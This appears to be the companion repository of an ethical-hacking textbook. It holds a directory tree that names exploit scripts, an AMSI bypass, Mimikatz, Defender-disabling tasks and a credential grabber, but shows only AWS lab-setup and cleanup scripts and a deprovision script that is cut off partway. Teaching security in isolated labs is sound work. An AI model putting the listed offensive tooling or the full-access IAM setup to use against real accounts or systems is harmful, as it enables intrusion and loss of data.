Repository: GrayHatHacking/GHHv6
Branch: main
Commit: bd396187f804
Files: 500
Total size: 174.8 MB
Directory structure:
gitextract_9jdookxc/
├── .gitignore
├── CloudSetup/
│ ├── README.md
│ ├── build-images.sh
│ ├── delete-old-images.sh
│ ├── delete-orphaned-snaps.sh
│ ├── deprovision.sh
│ ├── eksall.template
│ ├── find-orphaned-snaps.sh
│ ├── install-cloud-tools.sh
│ ├── kali-base/
│ │ ├── config.sh
│ │ └── kali.hcl
│ ├── provision.sh
│ ├── server-2016-base/
│ │ ├── bootstrap.ps1
│ │ ├── server2016_template.json
│ │ └── user_data.ps1
│ └── server-2019-base/
│ ├── bootstrap.ps1
│ ├── server2019_template.json
│ └── user_data.ps1
├── README.md
├── ch02/
│ ├── client.py
│ ├── fmt_str.c
│ ├── hello.asm
│ ├── hello.c
│ ├── ifelse.c
│ ├── meet.c
│ ├── memory.c
│ ├── targets
│ └── while_ex.c
├── ch03/
│ ├── heapme_demo.c
│ ├── hello.c
│ ├── leak-bof-exploit.py
│ └── leak-bof.c
├── ch04/
│ ├── students-patched.c
│ ├── students.c
│ └── students.csv
├── ch05/
│ ├── myAtoi
│ ├── myAtoi.c
│ ├── myProg
│ └── myProg.c
├── ch07/
│ ├── Lab/
│ │ ├── ansible/
│ │ │ ├── ansible.cfg
│ │ │ ├── ch07_playbook.yml
│ │ │ ├── roles/
│ │ │ │ ├── common/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── meta/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── chocolatey-components.yml
│ │ │ │ │ ├── main.yml
│ │ │ │ │ ├── windows-components.yml
│ │ │ │ │ └── windows-disable-defender.yml
│ │ │ │ ├── kali_customizations/
│ │ │ │ │ ├── files/
│ │ │ │ │ │ ├── addshare.txt
│ │ │ │ │ │ ├── covenant.patch
│ │ │ │ │ │ └── shells/
│ │ │ │ │ │ ├── build_csharp.sh
│ │ │ │ │ │ ├── build_go.sh
│ │ │ │ │ │ ├── build_nim.sh
│ │ │ │ │ │ ├── csharp.template
│ │ │ │ │ │ ├── execute.template
│ │ │ │ │ │ ├── go.mod
│ │ │ │ │ │ ├── go.sum
│ │ │ │ │ │ ├── go.template
│ │ │ │ │ │ └── nim.template
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── .main.yml.swp
│ │ │ │ │ └── main.yml
│ │ │ │ ├── target_customizations/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── windows_client_join_domain/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── windows_dns_server/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── features.yml
│ │ │ │ │ ├── main.yaml
│ │ │ │ │ └── reboot.yml
│ │ │ │ ├── windows_domain_controller/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── create.yml
│ │ │ │ │ ├── main.yaml
│ │ │ │ │ └── reboot.yml
│ │ │ │ ├── windows_domain_users_groups/
│ │ │ │ │ ├── files/
│ │ │ │ │ │ └── usermods.ps1
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ └── windows_local_group_membership/
│ │ │ │ └── tasks/
│ │ │ │ └── main.yml
│ │ │ └── vars/
│ │ │ ├── users.yml
│ │ │ └── vars.yml
│ │ ├── build.sh
│ │ ├── destroy.sh
│ │ └── terraform/
│ │ ├── aws_data.tf
│ │ ├── aws_hosts.tf
│ │ ├── inventory.tmpl
│ │ ├── main.tf
│ │ ├── outputs.tf
│ │ ├── terraform.tfvars-orig
│ │ ├── variables.tf
│ │ ├── versions.tf
│ │ └── vpc.tf
│ └── README.md
├── ch08/
│ └── winlogbeat.yml
├── ch10/
│ ├── ch10_6
│ ├── ch10_6_exploit.py
│ ├── getenv.c
│ ├── meet.c
│ ├── meet_exploit.py
│ ├── overflow.c
│ ├── shellcode.c
│ ├── smallbuff.c
│ └── smallbuff_exploit.py
├── ch11/
│ ├── README.md
│ ├── exploit1.py
│ ├── exploit2.py
│ ├── exploit3-v2.py
│ ├── exploit3.py
│ ├── exploit4.py
│ ├── vuln
│ └── vuln.c
├── ch12/
│ ├── bzImage
│ ├── initramfs.cpio
│ ├── run1.sh
│ ├── run2.sh
│ ├── run3.sh
│ ├── run4.sh
│ ├── run5.sh
│ ├── shared/
│ │ ├── .ash_history
│ │ ├── exploit1/
│ │ │ └── exploit.c
│ │ ├── exploit2/
│ │ │ └── exploit.c
│ │ ├── exploit3/
│ │ │ └── exploit.c
│ │ ├── exploit4/
│ │ │ └── exploit.c
│ │ ├── exploit5/
│ │ │ └── exploit.c
│ │ └── leak.c
│ ├── stackprotector-disabled/
│ │ ├── bzImage
│ │ └── vmlinux
│ └── vmlinux
├── ch13/
│ ├── hello.c
│ ├── meet.c
│ ├── prosshd1.py
│ ├── prosshd2.py
│ ├── prosshd3.py
│ └── prosshd_dep.py
├── ch14/
│ ├── binaries/
│ │ └── DBUtil_2_3.Sys
│ ├── dbutil_exploit/
│ │ ├── Cargo.toml
│ │ └── src/
│ │ ├── bin/
│ │ │ ├── exploit.rs
│ │ │ └── ioctlcall.rs
│ │ └── lib.rs
│ ├── dbutil_exploit.c
│ ├── dbutil_exploit.py
│ └── ioctlcall.py
├── ch15/
│ ├── Lab/
│ │ ├── ansible/
│ │ │ ├── ansible.cfg
│ │ │ ├── ch15_playbook.yml
│ │ │ ├── roles/
│ │ │ │ ├── common/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── meta/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── chocolatey-components.yml
│ │ │ │ │ ├── main.yml
│ │ │ │ │ ├── windows-components.yml
│ │ │ │ │ └── windows-disable-defender.yml
│ │ │ │ ├── kali_customizations/
│ │ │ │ │ ├── files/
│ │ │ │ │ │ ├── Invoke-Mimikatz.ps1
│ │ │ │ │ │ └── amsi.ps1
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ └── target_customizations/
│ │ │ │ └── tasks/
│ │ │ │ └── main.yml
│ │ │ └── vars/
│ │ │ ├── users.yml
│ │ │ └── vars.yml
│ │ ├── build.sh
│ │ ├── destroy.sh
│ │ ├── get-ips.sh
│ │ └── terraform/
│ │ ├── aws_data.tf
│ │ ├── aws_hosts.tf
│ │ ├── inventory.tmpl
│ │ ├── main.tf
│ │ ├── outputs.tf
│ │ ├── terraform.tfvars-orig
│ │ ├── variables.tf
│ │ ├── versions.tf
│ │ └── vpc.tf
│ └── README.md
├── ch16/
│ ├── Lab/
│ │ ├── ansible/
│ │ │ ├── ansible.cfg
│ │ │ ├── ch16_playbook.yml
│ │ │ ├── roles/
│ │ │ │ ├── common/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── meta/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── chocolatey-components.yml
│ │ │ │ │ ├── main.yml
│ │ │ │ │ ├── windows-components.yml
│ │ │ │ │ └── windows-disable-defender.yml
│ │ │ │ ├── kali_customizations/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── target_customizations/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── util_customizations/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── windows_client_join_domain/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── windows_dns_server/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── features.yml
│ │ │ │ │ ├── main.yaml
│ │ │ │ │ └── reboot.yml
│ │ │ │ ├── windows_domain_controller/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── create.yml
│ │ │ │ │ ├── main.yaml
│ │ │ │ │ └── reboot.yml
│ │ │ │ ├── windows_domain_users_groups/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ └── windows_local_group_membership/
│ │ │ │ └── tasks/
│ │ │ │ └── main.yml
│ │ │ └── vars/
│ │ │ ├── users.yml
│ │ │ └── vars.yml
│ │ ├── build.sh
│ │ ├── destroy.sh
│ │ ├── terminate-util.sh
│ │ └── terraform/
│ │ ├── aws_data.tf
│ │ ├── aws_hosts.tf
│ │ ├── inventory.tmpl
│ │ ├── main.tf
│ │ ├── outputs.tf
│ │ ├── terraform.tfvars-orig
│ │ ├── variables.tf
│ │ ├── versions.tf
│ │ └── vpc.tf
│ ├── README.md
│ └── passwords.txt
├── ch17/
│ ├── Lab/
│ │ ├── ansible/
│ │ │ ├── ansible.cfg
│ │ │ ├── ch17_playbook.yml
│ │ │ ├── roles/
│ │ │ │ ├── common/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── meta/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── chocolatey-components.yml
│ │ │ │ │ ├── main.yml
│ │ │ │ │ ├── windows-components.yml
│ │ │ │ │ └── windows-disable-defender.yml
│ │ │ │ ├── kali_customizations/
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── .main.yml.swp
│ │ │ │ │ └── main.yml
│ │ │ │ ├── target_customizations/
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── .main.yml.swp
│ │ │ │ │ └── main.yml
│ │ │ │ ├── util_customizations/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── windows_client_join_domain/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── windows_dns_server/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── features.yml
│ │ │ │ │ ├── main.yaml
│ │ │ │ │ └── reboot.yml
│ │ │ │ ├── windows_domain_controller/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── create.yml
│ │ │ │ │ ├── main.yaml
│ │ │ │ │ └── reboot.yml
│ │ │ │ ├── windows_domain_users_groups/
│ │ │ │ │ ├── files/
│ │ │ │ │ │ └── usermods.ps1
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ └── windows_local_group_membership/
│ │ │ │ └── tasks/
│ │ │ │ └── main.yml
│ │ │ └── vars/
│ │ │ ├── users.yml
│ │ │ └── vars.yml
│ │ ├── build.sh
│ │ ├── destroy.sh
│ │ ├── terminate-util.sh
│ │ └── terraform/
│ │ ├── aws_data.tf
│ │ ├── aws_hosts.tf
│ │ ├── inventory.tmpl
│ │ ├── main.tf
│ │ ├── outputs.tf
│ │ ├── terraform.tfvars-orig
│ │ ├── variables.tf
│ │ ├── versions.tf
│ │ └── vpc.tf
│ ├── README.md
│ └── Run-SDProp.ps1
├── ch18/
│ ├── name
│ ├── name2
│ └── test
├── ch19/
│ ├── lab-19-1/
│ │ └── README.txt
│ ├── lab-19-2/
│ │ ├── README.txt
│ │ ├── facet-search.py
│ │ ├── install.sh
│ │ └── mqtt-search.py
│ └── lab-19-3/
│ ├── README.txt
│ └── mqtt-scan.py
├── ch21/
│ ├── lab-21-1/
│ │ ├── README.txt
│ │ └── lab-21-1.sh
│ ├── lab-21-2/
│ │ ├── lab-21-2.sh
│ │ └── ssi
│ ├── lab-21-3/
│ │ └── README.txt
│ ├── lab-21-4/
│ │ └── README.txt
│ └── lab-21-5/
│ └── README.txt
├── ch22/
│ ├── Analyze/
│ │ ├── README.txt
│ │ ├── cmds.txt
│ │ ├── decode-inspectrum.py
│ │ └── install.sh
│ ├── Capture/
│ │ ├── README.txt
│ │ ├── remote1-1off-4m-316mhz
│ │ ├── remote1-1on-4m-316mhz
│ │ ├── remote1-2off-4m-316mhz
│ │ ├── remote1-2on-4m-316mhz
│ │ ├── remote1-3off-4m-316mhz
│ │ ├── remote1-3on-4m-316mhz
│ │ ├── remote2-1off-4m-316mhz
│ │ ├── remote2-1on-4m-316mhz
│ │ ├── remote2-2off-4m-316mhz
│ │ ├── remote2-2on-4m-316mhz
│ │ ├── remote2-3off-4m-316mhz
│ │ ├── remote2-3on-4m-316mhz
│ │ └── remote_analysis.grc
│ ├── Execute/
│ │ ├── README.txt
│ │ └── test-execute.grc
│ ├── Preview/
│ │ ├── README.txt
│ │ └── test-preview.grc
│ └── Replay/
│ ├── README.txt
│ └── remote_analysis_replay.grc
├── ch24/
│ ├── Dockerfile
│ ├── README.md
│ └── labs/
│ ├── lab1/
│ │ ├── Makefile
│ │ ├── bootstrap.asm
│ │ ├── common.c
│ │ ├── common.h
│ │ ├── iso/
│ │ │ └── boot/
│ │ │ └── grub/
│ │ │ └── grub.cfg
│ │ └── main.c
│ ├── lab2/
│ │ ├── Makefile
│ │ ├── bootstrap.asm
│ │ ├── common.c
│ │ ├── common.h
│ │ ├── iso/
│ │ │ └── boot/
│ │ │ └── grub/
│ │ │ └── grub.cfg
│ │ ├── main.c
│ │ ├── protocol.c
│ │ └── protocol.h
│ ├── lab3/
│ │ ├── Makefile
│ │ ├── bootstrap.asm
│ │ ├── common.c
│ │ ├── common.h
│ │ ├── guest.py
│ │ ├── iso/
│ │ │ └── boot/
│ │ │ └── grub/
│ │ │ └── grub.cfg
│ │ ├── main.c
│ │ ├── main.py
│ │ ├── multiboot2.h
│ │ ├── protocol.c
│ │ ├── protocol.h
│ │ └── protocol.py
│ ├── lab4/
│ │ ├── Makefile
│ │ ├── bootstrap.asm
│ │ ├── code.py
│ │ ├── common.c
│ │ ├── common.h
│ │ ├── guest.py
│ │ ├── iso/
│ │ │ └── boot/
│ │ │ └── grub/
│ │ │ └── grub.cfg
│ │ ├── macros.asm
│ │ ├── main.c
│ │ ├── main.py
│ │ ├── multiboot2.h
│ │ ├── protocol.c
│ │ ├── protocol.h
│ │ ├── protocol.py
│ │ └── remotemem.py
│ ├── lab5/
│ │ ├── Makefile
│ │ ├── bootstrap.asm
│ │ ├── code.py
│ │ ├── common.c
│ │ ├── common.h
│ │ ├── fuzzer.py
│ │ ├── guest.py
│ │ ├── iso/
│ │ │ └── boot/
│ │ │ └── grub/
│ │ │ └── grub.cfg
│ │ ├── macros.asm
│ │ ├── main.c
│ │ ├── multiboot2.h
│ │ ├── port_fuzzer.py
│ │ ├── protocol.c
│ │ ├── protocol.h
│ │ ├── protocol.py
│ │ └── remotemem.py
│ ├── lab6/
│ │ ├── Makefile
│ │ ├── bootstrap.asm
│ │ ├── code.py
│ │ ├── common.c
│ │ ├── common.h
│ │ ├── fuzzer.py
│ │ ├── guest.py
│ │ ├── iso/
│ │ │ └── boot/
│ │ │ └── grub/
│ │ │ └── grub.cfg
│ │ ├── macros.asm
│ │ ├── main.c
│ │ ├── msr_fuzzer.py
│ │ ├── multiboot2.h
│ │ ├── protocol.c
│ │ ├── protocol.h
│ │ ├── protocol.py
│ │ └── remotemem.py
│ └── lab7/
│ ├── Makefile
│ ├── bootstrap.asm
│ ├── code.py
│ ├── common.c
│ ├── common.h
│ ├── fuzzer.py
│ ├── guest.py
│ ├── iso/
│ │ └── boot/
│ │ └── grub/
│ │ └── grub.cfg
│ ├── macros.asm
│ ├── main.c
│ ├── msr_fuzzer.py
│ ├── multiboot2.h
│ ├── protocol.c
│ ├── protocol.h
│ ├── protocol.py
│ └── remotemem.py
├── ch25/
│ ├── Dockerfile
│ └── labs/
│ ├── Makefile
│ ├── bootstrap.asm
│ ├── code.py
│ ├── common.c
│ ├── common.h
│ ├── guest.py
│ ├── hypercall.py
│ ├── hyperv_guest.py
│ ├── iso/
│ │ └── boot/
│ │ └── grub/
│ │ └── grub.cfg
│ ├── macros.asm
│ ├── main.c
│ ├── multiboot2.h
│ ├── pci.py
│ ├── protocol.c
│ ├── protocol.h
│ ├── protocol.py
│ ├── remotemem.py
│ ├── session.py
│ ├── time_sync.py
│ └── vmbus.py
├── ch26/
│ ├── Dockerfile
│ └── labs/
│ ├── Makefile
│ ├── bootstrap.asm
│ ├── code.py
│ ├── common.c
│ ├── common.h
│ ├── cstruct.py
│ ├── ehci.py
│ ├── guest.py
│ ├── iso/
│ │ └── boot/
│ │ └── grub/
│ │ └── grub.cfg
│ ├── macros.asm
│ ├── main.c
│ ├── multiboot2.h
│ ├── pci.py
│ ├── protocol.c
│ ├── protocol.h
│ ├── protocol.py
│ ├── qemu_guest.py
│ ├── qemu_xpl.py
│ ├── remotemem.py
│ ├── session.py
│ └── trigger.py
├── ch27/
│ ├── README.md
│ └── lab/
│ ├── ansible/
│ │ ├── ansible.cfg
│ │ ├── ch27_playbook.yml
│ │ ├── roles/
│ │ │ ├── common/
│ │ │ │ └── default/
│ │ │ │ └── main.yml
│ │ │ ├── kali_customizations/
│ │ │ │ ├── files/
│ │ │ │ │ └── getEC2WinCreds.py
│ │ │ │ └── tasks/
│ │ │ │ └── main.yml
│ │ │ └── victim1/
│ │ │ └── tasks/
│ │ │ └── main.yml
│ │ └── vars/
│ │ ├── users.yml
│ │ └── vars.yml
│ ├── apps/
│ │ └── webapp/
│ │ └── index.js
│ ├── build.sh
│ ├── destroy.sh
│ ├── terraform/
│ │ ├── data.tf
│ │ ├── documents/
│ │ │ └── perform_healthcheck.yml
│ │ ├── ec2.tf
│ │ ├── iam.tf
│ │ ├── inventory.tmpl
│ │ ├── main.tf
│ │ ├── output.tf
│ │ ├── s3.tf
│ │ ├── variables.tf
│ │ └── vpc.tf
│ └── terraform2/
│ ├── build2.sh
│ ├── data.tf
│ ├── destroy2.sh
│ ├── ec2.tf
│ ├── inventory.tmpl
│ ├── main.tf
│ ├── output.tf
│ ├── variables.tf
│ └── vpc.tf
├── ch28/
│ ├── Metasploit.md
│ └── get_managed_id.ps1
├── ch29/
│ ├── Lab/
│ │ ├── ansible/
│ │ │ ├── ansible.cfg
│ │ │ ├── ch29_playbook.yml
│ │ │ ├── roles/
│ │ │ │ ├── common/
│ │ │ │ │ └── defaults/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── docker/
│ │ │ │ │ ├── files/
│ │ │ │ │ │ ├── daemon.json
│ │ │ │ │ │ └── override.conf
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ └── kali_customizations/
│ │ │ │ └── tasks/
│ │ │ │ └── main.yml
│ │ │ └── vars/
│ │ │ ├── users.yml
│ │ │ └── vars.yml
│ │ ├── build.sh
│ │ ├── destroy.sh
│ │ ├── easy/
│ │ │ └── Dockerfile
│ │ ├── nmap/
│ │ │ ├── Dockerfile
│ │ │ └── output/
│ │ │ └── test
│ │ ├── targets/
│ │ │ ├── docker-compose.yml
│ │ │ └── web/
│ │ │ ├── .dockerignore
│ │ │ ├── .gitignore
│ │ │ ├── Dockerfile
│ │ │ ├── app.py
│ │ │ ├── requirements.txt
│ │ │ └── templates/
│ │ │ ├── base.html
│ │ │ └── index.html
│ │ └── terraform/
│ │ ├── aws_data.tf
│ │ ├── aws_hosts.tf
│ │ ├── inventory.tmpl
│ │ ├── main.tf
│ │ ├── output.tf
│ │ ├── variables.tf
│ │ └── vpc.tf
│ └── README.md
└── ch30/
├── Lab/
│ ├── .gitignore
│ ├── badperms.yml
│ ├── build.sh
│ ├── container.yml
│ ├── destroy.sh
│ ├── eksctl.yml
│ ├── ncat-svc.yml
│ └── ncat.yml
└── README.md
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
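# Terraform local state and its backups: they record every resource id and
# frequently embed secrets that passed through the configuration.
*.tfstate*
**/.terraform.lock.hcl
**/.terraform

# Per-user variable files. Each lab ships a reference copy as
# terraform.tfvars-orig (which this pattern does not match); the live copy the
# reader creates from it carries account-specific values and stays local.
*.tfvars
# Kept for compatibility with earlier checkouts that relied on this spelling.
*.tvars

# Written by CloudSetup/provision.sh from `aws iam create-access-key`; it holds
# the ghh user's secret access key in cleartext and must never be committed.
key-out.json

# macOS Finder metadata
*.DS_Store
**/*.DS_Store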
================================================
FILE: CloudSetup/README.md
================================================
The following instructions are for all AWS labs in this book. There are separate instructions for Azure inside Chapter 8 of the book.
###### Cloud Setup Instructions
1. Sign up for an AWS account
Go to https://aws.amazon.com and sign up for a new account
2. These labs have been designed to run under a *nix installation. This can be a downloaded Kali (https://www.kali.org/downloads/)
installation, your favorite *nix implementation of choice, or Windows Subsystem for Linux
(https://docs.microsoft.com/en-us/windows/wsl/install-win10).
Alternatively, if you want to do this all in the cloud, once you've signed into your account go to Amazon CloudShell. If you do this, make sure it has its own tab, because you will need to copy and paste information from other pages in the AWS console.
3. Install the following items:
AWS Cli (https://docs.aws.amazon.com/cli/latest/userguide/install-cliv2-linux.html)
Packer (https://learn.hashicorp.com/tutorials/packer/getting-started-install)
Terraform (https://learn.hashicorp.com/tutorials/terraform/install-cli)
Ansible (https://docs.ansible.com/ansible/latest/installation_guide/intro_installation.html)
jq (apt-get install jq or https://stedolan.github.io/jq/)
If you are using Amazon CloudShell, run these commands
```
git clone https://github.com/GrayHatHacking/GHHv6.git
cd GHHv6/CloudSetup
bash install-cloud-tools.sh
. ~/.bash_profile
```
If you are using Kali Linux, run these commands
```
git clone https://github.com/GrayHatHacking/GHHv6.git
sudo apt-get update
sudo apt-get install awscli packer software-properties-common ansible jq
curl -fsSL https://apt.releases.hashicorp.com/gpg | sudo apt-key add -
sudo apt-add-repository "deb [arch=amd64] https://apt.releases.hashicorp.com buster main"
sudo apt-get update && sudo apt-get install terraform
```
4. In the AWS console, go to "My Security Credentials"<BR>
 <BR>
Go to access keys and Click "New Access Key"<BR>
 <BR>
Download the key file <BR>
 <BR>
5. Open the file in an editor, then open a console window and type in:
`aws configure` <BR>
 <BR>
Add the access key and the secret key from the file to the configuration and choose `us-east-1` for the region.<BR>
This region has all the AWS features we will need, so it is a safe default. For the default output format, choose `json`.
6. If you have not already done so, execute a git clone of this repository:
`git clone https://github.com/GrayHatHacking/GHHv6.git`
Change directory into the CloudSetup directory and then run the `provision.sh` file. This will create all of the roles and permissions needed for the
exercises in the book. It will create a new user called `ghh` and a new profile called `ghh` so that all of the examples
will work without modification.
7. An SSH key pair will be needed for these exercises. If you have not created one, run `ssh-keygen` to
generate a new key pair. The result should be a file in `~/.ssh/` called `id_rsa` and one called `id_rsa.pub`.
The public key will be imported into AWS in the next step so that you can SSH to the lab instances, which makes the rest of the examples easier.
8. Create the keypair in AWS:<BR>
`aws ec2 import-key-pair --key-name ghh --public-key-material fileb://~/.ssh/id_rsa.pub --profile=ghh --region=us-east-1`
9. Run `build-images.sh` to build the base images for the rest of the exercises. This will take a few minutes to an hour.
================================================
FILE: CloudSetup/build-images.sh
================================================
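#!/bin/bash
# Builds the three base AMIs (Kali, Server 2016, Server 2019) with Packer.
# Expects the `ghh` AWS profile created by provision.sh, which the templates
# reference. Each build is attempted even if an earlier one failed; the exit
# status is non-zero if any of them failed.

# Prefer the pinned copy that install-cloud-tools.sh drops in ~/.local/bin
# over whatever the system packer happens to be.
PACKER=/usr/bin/packer
if [ -f ~/.local/bin/packer ] ; then
    PACKER=~/.local/bin/packer
fi

# Resolve the template directories relative to this script. The original
# relied on the caller's cwd and did not check its `cd` calls, so a wrong cwd
# made every subsequent `cd ../...` fail and ran the builds from the wrong
# directory.
cd "$(dirname "$0")" || exit 1

# Each build runs in its own directory because the templates refer to their
# provisioning scripts by relative path (e.g. kali.hcl's `source = "config.sh"`).
# A subshell scopes the `cd`, so a failed cd cannot leak into the next build.
rc=0
( cd kali-base        && "$PACKER" build kali.hcl )                   || rc=1
( cd server-2016-base && "$PACKER" build server2016_template.json )   || rc=1
( cd server-2019-base && "$PACKER" build server2019_template.json )   || rc=1
exit $rc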
================================================
FILE: CloudSetup/delete-old-images.sh
================================================
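#!/bin/bash
# Deregisters every ghh-* AMI except the most recently created one of each
# family, so repeated build-images.sh runs do not accumulate old images.
# Deregistering an AMI leaves its EBS snapshot behind; run
# delete-orphaned-snaps.sh afterwards to reclaim that storage.
RED='\033[0;31m'
WHITE='\033[0;37m'
GREEN='\033[0;32m'
NC='\033[0m' # No Color
PROFILE=ghh
REGION=us-east-1
imagelist=(ghh-server2016 ghh-server2019 ghh-kali)

for i in "${imagelist[@]}"; do
    # Newest image id for this family: sort by CreationDate descending and
    # keep the ImageId column.
    latest=$(aws ec2 describe-images --owner=self --filter "Name=name,Values=$i-*" \
        --query "Images[*].[Name,ImageId,CreationDate ]" --output text \
        --profile="$PROFILE" --region="$REGION" | sort -k3 -r | head -1 | cut -f 2)
    all=$(aws ec2 describe-images --owner=self --filter "Name=name,Values=$i-*" \
        --query "Images[*].[ImageId]" --output text --profile="$PROFILE" --region="$REGION")
    # Values go through %s rather than into the format string so a stray '%'
    # in an image name cannot be interpreted by printf.
    printf "${WHITE}[=] Searching for %s, found latest %s${NC}\n" "$i" "$latest"

    # If the "latest" lookup came back empty (no images, or a failed call) the
    # original unquoted comparison errored and fell into the delete branch for
    # every image. With nothing to protect, refuse to delete anything.
    if [ -z "$latest" ]; then
        printf "${RED}[-] No latest image found for %s, skipping${NC}\n" "$i"
        continue
    fi

    for img in $all; do
        if [ "$img" == "$latest" ]; then
            printf "${GREEN}[*] Skipping delete of latest image %s${NC}\n" "$img"
        else
            printf "${RED}[-] Deregistering old image %s${NC}\n" "$img"
            aws ec2 deregister-image --image-id "$img" --profile="$PROFILE" --region="$REGION"
        fi
    done
    printf "${NC}\n"
done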
================================================
FILE: CloudSetup/delete-orphaned-snaps.sh
================================================
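#!/bin/bash
# Deletes every snapshot owned by this account that no AMI of ours still
# references. Snapshots are left behind when an AMI is deregistered (see
# delete-old-images.sh) and keep accruing storage charges. This is
# destructive: find-orphaned-snaps.sh prints the same classification without
# deleting, and is the safer first run.
RED='\033[0;31m'
WHITE='\033[0;37m'
GREEN='\033[0;32m'
NC='\033[0m' # No Color
PROFILE=ghh
REGION=us-east-1

printf "${WHITE}[*] Retrieving image list${NC}\n"
# Collect the snapshot behind EVERY block device of every image. The original
# query read only BlockDeviceMappings[0], so an image with a second volume had
# that volume's snapshot classified as orphaned and deleted.
# Abort if the call fails: an empty reference list would mark every snapshot
# in the account as orphaned.
snaplist=$(aws ec2 describe-images --owner self \
    --query "Images[].BlockDeviceMappings[].Ebs.SnapshotId" --output text \
    --region="$REGION" --profile="$PROFILE") \
    || { echo "[-] describe-images failed, refusing to delete anything" >&2; exit 1; }

printf "${WHITE}[*] Retrieving snapshot list${NC}\n"
allsnaps=$(aws ec2 describe-snapshots --owner self --profile="$PROFILE" --region="$REGION" \
    --query "Snapshots[*].SnapshotId" --output text) \
    || { echo "[-] describe-snapshots failed" >&2; exit 1; }

# Index the referenced ids once instead of rescanning the list per snapshot.
declare -A inuse
for l in $snaplist; do
    inuse["$l"]=1
done

for snap in $allsnaps; do
    if [ -n "${inuse[$snap]:-}" ]; then
        printf "${GREEN}[+] Snap %s is active${NC}\n" "$snap"
    else
        printf "${RED}[-] Snap %s is not active..Deleting${NC}\n" "$snap"
        aws ec2 delete-snapshot --snapshot-id "$snap" --profile="$PROFILE" --region="$REGION"
    fi
done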
================================================
FILE: CloudSetup/deprovision.sh
================================================
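#!/bin/bash
# Reverses provision.sh: detaches the managed policies it attached to
# ghh-group, deletes the group, deletes the access key recorded in
# key-out.json and finally deletes the ghh user. Runs under the caller's
# default AWS profile, which needs IAM rights.
AWS=$(which aws)
JQ=$(which jq)
# Missing prerequisites are fatal; a bare `exit` returned 0 and let callers
# believe deprovisioning had succeeded.
if [ -z "$AWS" ] || ! test -f "$AWS"; then
    echo "AWS cli is required for execution, please install and try again"
    exit 1
fi
if [ -z "$JQ" ] || ! test -f "$JQ"; then
    echo "JQ is required for execution, please install and try again"
    exit 1
fi
if ! test -f "key-out.json"; then
    echo "Cannot deprovision without the key-out.json file"
    exit 1
fi

GROUP=ghh-group
USER_NAME=ghh   # not $USER, which the shell already uses

# IAM refuses to delete a group that still has attached policies, so this list
# must match the attach-group-policy calls in provision.sh. The original
# omitted AmazonEKSClusterPolicy and AWSCloudFormationFullAccess, which
# provision.sh attaches, and the delete-group call then failed.
# NOTE(review): provision.sh also renders eksall.template into eksall.json; if
# it goes on to create and attach a customer-managed policy from it (not
# visible here), that policy must be detached and deleted here as well.
policies=(
    AmazonEC2FullAccess
    AmazonS3FullAccess
    IAMFullAccess
    AmazonSSMFullAccess
    AmazonRoute53FullAccess
    AmazonEKSClusterPolicy
    AWSCloudFormationFullAccess
)

aws iam remove-user-from-group --user-name "$USER_NAME" --group-name "$GROUP"
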